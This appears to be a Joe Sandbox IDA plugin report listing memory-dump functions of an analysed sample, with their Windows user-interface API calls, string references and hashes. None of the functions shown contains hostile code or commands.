Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ShowTimer$BringKillRect
String ID: c
API String ID: 2659093394-2927717585
Opcode ID: 17224ba0e48350d1db159078cefbf543bab41f6cd99f3d56a281187575d133e6
Instruction ID: 3243cc45071ab99a067ef372619acf835bdbb67befb9db4b27526320600fb9b4
Opcode Fuzzy Hash: 17224ba0e48350d1db159078cefbf543bab41f6cd99f3d56a281187575d133e6
Instruction Fuzzy Hash: 2D815A31A00115DFCF15DFA8C8D8AAE7FB5BF49340F1544B9F94AEB266CA319940CB60

Function 005401AC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005401F9
ScreenToClient.USER32(?,?), ref: 00540206
PtInRect.USER32(?,?,?), ref: 00540219
GetCursorPos.USER32(?), ref: 00540257
ScreenToClient.USER32(?,?), ref: 00540264
PtInRect.USER32(?,?,?), ref: 00540277
InflateRect.USER32(?,?,?), ref: 00540366
RedrawWindow.USER32(?,?,00000000,00000401), ref: 0054037D

Strings

(`, xrefs: 005402A8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientCursorScreen$InflateRedrawWindow
String ID: (`
API String ID: 4131952207-4108213102
Opcode ID: f2c9f27a9a7cfe533236108d2a049e8607ade630df39de9cb7d118c64f8614b7
Instruction ID: d17961e6397863a4d9c30a7dff5d21bf56582b582e780b8505d77ba0be90ca68
Opcode Fuzzy Hash: f2c9f27a9a7cfe533236108d2a049e8607ade630df39de9cb7d118c64f8614b7
Instruction Fuzzy Hash: 5551BF31A00204EFCF11DFA5C888AED7BB9FF49308F2455AAEA09DA195DB759944CF20

Function 00584FD2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00584FD9
_wcslen.LIBCMT ref: 00585005
_memset.LIBCMT ref: 00585016
GetKeyboardLayout.USER32(00000000), ref: 0058501F
MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00585028
GetKeyNameTextW.USER32(00000000,?,00000032), ref: 0058504F
_wcslen.LIBCMT ref: 00585059
IsCharLowerW.USER32(00000000,?,00000000), ref: 0058508B

Strings

Pause, xrefs: 00584FFF, 00585004, 0058500C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$CharH_prolog3_KeyboardLayoutLowerNameTextVirtual_memset
String ID: Pause
API String ID: 192923521-375111145
Opcode ID: 949060075e9474a5117af2cebfa3c3fd829883d9aa7488b069706415d181bf23
Instruction ID: 52d7751193e0d8f493d81201301168f8026af008a4b3e9dfaba0c1f25bf2a8ae
Opcode Fuzzy Hash: 949060075e9474a5117af2cebfa3c3fd829883d9aa7488b069706415d181bf23
Instruction Fuzzy Hash: A341D631A00604AADB31B7A5CC49FBEBFA9BF94700F14041EF951B7292EBA49C40D7A4

Function 0054F8D7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0054F8F6
IsWindow.USER32(?), ref: 0054F906
MonitorFromPoint.USER32(?,?,00000002), ref: 0054F982
GetMonitorInfoW.USER32(00000000), ref: 0054F989
CopyRect.USER32(?,?), ref: 0054F99B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0054F9AB
GetWindowRect.USER32(?,?), ref: 0054F9FD

Strings

(, xrefs: 0054F97B
0c, xrefs: 0054F919

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$InfoMonitorRect$CopyFromParametersPointSystem
String ID: ($0c
API String ID: 731732153-2582404983
Opcode ID: 4c39ce5df1d48b31bf73983b9f937f5de8cc8d7217d8e7c9951208872a44c960
Instruction ID: 60232758538c43b110fef395ae35ca574512c79b54e4fa610a36035ce5036bba
Opcode Fuzzy Hash: 4c39ce5df1d48b31bf73983b9f937f5de8cc8d7217d8e7c9951208872a44c960
Instruction Fuzzy Hash: 72515F71A0060AAFCB14DFA9C984DEEBBF9FF88304F20452AE017D7214DB35A945DB60

Function 0053B259 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0053B285
PtInRect.USER32(?,?,?), ref: 0053B29B
GetClientRect.USER32(?,?), ref: 0053B2F0
PtInRect.USER32(?,?,?), ref: 0053B30B
OffsetRect.USER32(?,?,?), ref: 0053B347
PtInRect.USER32(?,?,?), ref: 0053B357

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

SetRect.USER32(?,?,?,?,?), ref: 0053B3B2
PtInRect.USER32(?,?,?), ref: 0053B3C2

Strings

c, xrefs: 0053B2B0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientException@8H_prolog3OffsetThrowWindow
String ID: c
API String ID: 3802755257-2927717585
Opcode ID: 62798a0b6a554c650c8e5d6c31dc8c5ba3d29644acf85174fe7c1b543a74ecf1
Instruction ID: e1891ffd540472a4a95bffaab587891bcf7c405e8f58c93fab7be2fac04ee1a0
Opcode Fuzzy Hash: 62798a0b6a554c650c8e5d6c31dc8c5ba3d29644acf85174fe7c1b543a74ecf1
Instruction Fuzzy Hash: 6451047190020AEFDF10EFA5D9849AEBBB9FF48344F10492EE616E7250DB359A45CB60

Function 005195DC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005195E3

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

swprintf.LIBCMT ref: 0051962D
_wcslen.LIBCMT ref: 00519636

Part of subcall function 004D5E30: _memcpy_s.LIBCMT ref: 004D5EC9

_wcslen.LIBCMT ref: 00519651
_wcslen.LIBCMT ref: 00519688
swprintf.LIBCMT ref: 005196B4
_wcslen.LIBCMT ref: 005196BD

Strings

- , xrefs: 0051964B, 00519650, 00519658, 00519682, 00519687, 0051968F
:%d, xrefs: 00519622, 005196A9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$swprintf$H_prolog3_LongWindow_memcpy_s
String ID: - $:%d
API String ID: 3834591121-2359489159
Opcode ID: 4b65761d2b33e04043f1fda287c843aad1a73f2f57f563b8d7179d1f513aa05e
Instruction ID: 2162518b54057dc0849a1995b34672e9db20d8cd3431a6be2f8c4a437dc066f4
Opcode Fuzzy Hash: 4b65761d2b33e04043f1fda287c843aad1a73f2f57f563b8d7179d1f513aa05e
Instruction Fuzzy Hash: FE319571900105ABEB05FBE1CD66EFFB76CBF00304F44442EB502AA256DF78AE1587A4

Function 004D8570 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 004D8599

Part of subcall function 005CF7E9: RaiseException.KERNEL32(004DA2E2,?,00000000,?,004DA2E2,?,?,004D106C,00000000), ref: 005CF82B

std::exception::exception.LIBCMT ref: 004D85C0
__CxxThrowException@8.LIBCMT ref: 004D85DF
std::exception::exception.LIBCMT ref: 004D8601
__CxxThrowException@8.LIBCMT ref: 004D8620
std::exception::exception.LIBCMT ref: 004D863D
__CxxThrowException@8.LIBCMT ref: 004D865C

Strings

|*b, xrefs: 004D85B8
d!b, xrefs: 004D8654

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: d!b$|*b
API String ID: 4237746311-1945837623
Opcode ID: 9e7d90f458a277d0cafb2562e3d1f82b5b2b917dc1fd20efadbcce97d882ae5d
Instruction ID: 6299f2d9f0b24d4922221adf9cc361931bbf828462cd5f47eba69dde71892ca3
Opcode Fuzzy Hash: 9e7d90f458a277d0cafb2562e3d1f82b5b2b917dc1fd20efadbcce97d882ae5d
Instruction Fuzzy Hash: 9E217CB24047026FC318EF99D41AFAEBBE5BFC8B14F04495EF19843241DBB485088BA6

Function 005B6D98 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B6D9F

Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F

GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 005B6DEF
GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 005B6DFE
GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 005B6E0D

Strings

DragScrollInterval, xrefs: 005B6E02
windows, xrefs: 005B6DE9, 005B6DEE, 005B6DF8, 005B6E07
DragScrollDelay, xrefs: 005B6DF3
Dza, xrefs: 005B6DB6
DragScrollInset, xrefs: 005B6DE4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$Dza$windows
API String ID: 4229786687-1035784782
Opcode ID: 88da07ec05ab62e9b7b16690cf274d85efd6eed3d184e4f65577d47bf8bc2aad
Instruction ID: e268e9546401244478df644c60709a620035b722f61f519ed7726732e33e6b6b
Opcode Fuzzy Hash: 88da07ec05ab62e9b7b16690cf274d85efd6eed3d184e4f65577d47bf8bc2aad
Instruction Fuzzy Hash: 3601A2B4A90740DED721EF668C06B4EBAF9BFA0B00F45151EF204AB2A1CBF45544CB08

Function 00522E2E Relevance: 15.1, APIs: 10, Instructions: 112windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00000000), ref: 00522E61
IsWindowVisible.USER32(00000000), ref: 00522E70
GetSystemMetrics.USER32(00000021), ref: 00522EA2
GetSystemMetrics.USER32(00000021), ref: 00522EA9
GetSystemMetrics.USER32(00000020), ref: 00522EAF

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

IsWindowVisible.USER32(00000000), ref: 00522ED7
IsWindowVisible.USER32(00000000), ref: 00522EE6
IsZoomed.USER32(00000000), ref: 00522F0C
GetSystemMetrics.USER32 ref: 00522F28
GetSystemMetrics.USER32(00000004), ref: 00522F6B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$VisibleWindow$Exception@8H_prolog3ThrowZoomed
String ID:
API String ID: 1383962431-0
Opcode ID: 3b513695637dda993c2e55f491ee4f4891f0c00e9759ac46e7bac3a9684deec9
Instruction ID: d9c8cd7c194a503595d5aa08495236a62d7bf6ed5a29553f6e88f5a4f36cb4f4
Opcode Fuzzy Hash: 3b513695637dda993c2e55f491ee4f4891f0c00e9759ac46e7bac3a9684deec9
Instruction Fuzzy Hash: 4141A934200322AFDB20DB26D989BB67BF4BF15354F054069E999CB2E1EB74EC44DB50

Function 0052C677 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0052C695
WindowFromPoint.USER32(?,?,?,00000001,?,00000000), ref: 0052C6A4
GetActiveWindow.USER32 ref: 0052C6C6
GetCurrentThreadId.KERNEL32 ref: 0052C6DE
GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C6ED
GetDesktopWindow.USER32 ref: 0052C6F9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
String ID:
API String ID: 1298419125-0
Opcode ID: e5a59e00b2f62287b0d9e1f073dd1078fbb592a5935d58aea613f12a221385a5
Instruction ID: 867b32896b72b52069d3e6cc09474fc8ac4921f5ec9304f752c709b0ea1f78d8
Opcode Fuzzy Hash: e5a59e00b2f62287b0d9e1f073dd1078fbb592a5935d58aea613f12a221385a5
Instruction Fuzzy Hash: 64317E75900225EFCF21AFA9E8888BDBFB5FF6A341B244559E402E7292DB349D04DF50

Function 004FA559 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004FA5D3
GetClientRect.USER32(?,?), ref: 004FA5E6
GetWindowRect.USER32(?,?), ref: 004FA634
GetParent.USER32(?), ref: 004FA63D
GetParent.USER32(?), ref: 004FA85A
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004FA87E

Strings

83`, xrefs: 004FA64A
0\`, xrefs: 004FA886

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$RectWindow$ClientRedraw
String ID: 0\`$83`
API String ID: 443302174-1803570628
Opcode ID: ec8143a8b422d28298df2b3f54134f106ff3b4ebb3292b4ad49f1bfd7dc2d644
Instruction ID: a76261868f28873bd8041d6e111987bc3e569c0d04d4cd1943dc5a1e162813a7
Opcode Fuzzy Hash: ec8143a8b422d28298df2b3f54134f106ff3b4ebb3292b4ad49f1bfd7dc2d644
Instruction Fuzzy Hash: 6AB14A71A002199FCF14EFA8C8889FEBBB5FF48740F14416AE509E7255DB389950CF66

Function 0054CFFC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0054D064
GetWindowRect.USER32(?,?), ref: 0054D071
GetWindowRect.USER32(?,?), ref: 0054D0BC
IntersectRect.USER32(?,?,?), ref: 0054D0CE

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

PtInRect.USER32(?,?,?), ref: 0054D151
GetWindowRect.USER32(?,?), ref: 0054D188
PtInRect.USER32(?,?,?), ref: 0054D198

Strings

d`, xrefs: 0054D082

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$CursorException@8H_prolog3IntersectThrow
String ID: d`
API String ID: 486806190-2819775335
Opcode ID: a4e7a30545bfa24915061606d7b2556d630833b203af5b6a7223f24937001062
Instruction ID: 7371736e4c1da10df26eb3e75a1020e1536671c2a72c05b2c7e3062af4ff751f
Opcode Fuzzy Hash: a4e7a30545bfa24915061606d7b2556d630833b203af5b6a7223f24937001062
Instruction Fuzzy Hash: 7391F4B1E0021A9FCF14DFA5D9889EDBFB9FF48704F25451AE401E2214EB709A45DFA0

Function 005405F5 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 00540664
DestroyMenu.USER32(?), ref: 0054067F
ClientToScreen.USER32(?,?), ref: 005406C6
GetWindowRect.USER32(?,?), ref: 005406E1
ClientToScreen.USER32(?,?), ref: 00540744
ClientToScreen.USER32(?,?), ref: 00540797
GetParent.USER32(?), ref: 005407F7

Strings

(`, xrefs: 005406A0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreen$DestroyMenu$ParentRectWindow
String ID: (`
API String ID: 1640059168-4108213102
Opcode ID: 5714e487544385157df85c83d154bd0e33f3c3b99d414dd6d62aad8a4ca8bd41
Instruction ID: 5a645dd56f1fdd048d46456d870831f5bca16ca3ff34da37c5a27e928e1ef47d
Opcode Fuzzy Hash: 5714e487544385157df85c83d154bd0e33f3c3b99d414dd6d62aad8a4ca8bd41
Instruction Fuzzy Hash: 70710875A00205DFDB14DFA5C884AAEBBF5FF48308F21486EE656D7290DB34A944DF90

Function 005354CF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005354D6

Part of subcall function 00558936: __EH_prolog3.LIBCMT ref: 0055893D

Part of subcall function 0059FF85: __EH_prolog3.LIBCMT ref: 0059FF8C

SetRectEmpty.USER32(?), ref: 0053566C
SetRectEmpty.USER32(?), ref: 00535675
SetRectEmpty.USER32(?), ref: 005356A2
SetRectEmpty.USER32(?), ref: 00535708
SetRectEmpty.USER32(?), ref: 00535711
SetRectEmpty.USER32(?), ref: 0053571A

Strings

d3`, xrefs: 005355BC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: d3`
API String ID: 3752103406-155631238
Opcode ID: c8dc1bbd9dfff6281a83cb0f538fc06758efbd5d1fbdef0e4697c2d27f0916d4
Instruction ID: 310157bac442372be9402777f4aa30f3b9a349a29452f5e907f25e47c32777b2
